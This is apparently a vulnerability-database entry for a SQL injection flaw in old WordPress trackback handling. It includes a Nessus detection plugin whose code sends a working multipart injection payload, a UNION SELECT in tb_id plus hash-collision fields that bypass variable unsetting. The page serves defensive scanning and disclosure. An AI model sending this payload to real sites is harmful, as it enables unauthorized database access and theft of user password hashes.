Vulnerabilities > CVE-2007-0233 - SQL Injection vulnerability in WordPress Wp-trackback.PHP

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
wordpress
nessus
exploit available

Summary

wp-trackback.php in WordPress 2.0.6 and earlier does not properly unset variables when the input data includes a numeric parameter with a value matching an alphanumeric parameter's hash value, which allows remote attackers to execute arbitrary SQL commands via the tb_id parameter. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in WordPress.

Exploit-Db

descriptionWordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit. CVE-2007-0233. Webapps exploit for php platform
fileexploits/php/webapps/3109.php
idEDB-ID:3109
last seen2016-01-31
modified2007-01-10
platformphp
port
published2007-01-10
reporterrgod
sourcehttps://www.exploit-db.com/download/3109/
titleWordPress <= 2.0.6 - wp-trackback.php Remote SQL Injection Exploit
typewebapps

Nessus

NASL familyCGI abuses
NASL idWORDPRESS_TB_ID_SQL_INJECTION.NASL
descriptionThe version of WordPress on the remote host fails to properly sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id24014
published2007-01-12
reporterThis script is Copyright (C) 2007-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/24014
titleWordPress Trackback 'wp-trackback.php' 'tb_id' Parameter SQL Injection
code
#
# Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(24014);
  script_version("1.20");
  script_cvs_date("Date: 2018/08/07 16:46:49");

  script_cve_id("CVE-2007-0233");
  script_bugtraq_id(21983);
  script_xref(name:"EDB-ID", value:"3109");

  script_name(english:"WordPress Trackback 'wp-trackback.php' 'tb_id' Parameter SQL Injection");
  script_summary(english:"Attempts to generate a SQL error.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
SQL injection attacks.");
  script_set_attribute(attribute:"description", value:
"The version of WordPress on the remote host fails to properly sanitize
input to the 'tb_id' parameter of the 'wp-trackback.php' script before
using it in database queries. An unauthenticated, remote attacker can
leverage this issue to launch SQL injection attacks against the
affected application, including discovery of password hashes of
WordPress users.

Note that successful exploitation of this issue requires that PHP's
'register_globals' setting be enabled and that the remote version of
PHP be older than 4.4.3 or 5.1.4.");
  # http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ccaf872d");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/01/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/01/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.");

  script_dependencies("wordpress_detect.nasl");
  script_require_keys("installed_sw/WordPress", "www/PHP");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "WordPress";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Make sure the affected script exists.
url = dir + "/wp-trackback.php";
w = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
res = w[2];

# If it does...
if ("need an ID for this to work" >< res)
{
  # Try to exploit the flaw to generate a SQL error.
  sql = rand() + "/**/UNION/**/SELECT/**/" + SCRIPT_NAME;
  bound = "bound";
  boundary = string("--", bound);
  postdata =
    boundary + '\r\n' +
    'Content-Disposition: form-data; name="title"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      SCRIPT_NAME + '\r\n' +

      boundary + "\r\n" +
      'Content-Disposition: form-data; name="url"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      'nessus\r\n' +

      boundary + "\r\n" +
      'Content-Disposition: form-data; name="blog_name"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      'nessus\r\n' +

      boundary + "\r\n" +
      'Content-Disposition: form-data; name="tb_id"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      sql + '\r\n' +

      boundary + "\r\n" +
      'Content-Disposition: form-data; name="496546471"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      '1\r\n' +

      boundary + "\r\n" +
      'Content-Disposition: form-data; name="1740009377"\r\n' +
      'Content-Type: text/plain\r\n' +
      '\r\n' +
      '1\r\n' +

      boundary + '--\r\n';
  w = http_send_recv3(method: "POST",  item: url+"?tb_id=1", port:port,
      content_type: "multipart/form-data; boundary="+bound,
      data: postdata, exit_on_fail:TRUE);
  res = w[2];

  # There's a problem if we see an error.
  if (
    "class='wpdberror'" >< res &&
    " WHERE ID = " + sql + "</code>" >< res
  )
  {
    set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
    security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);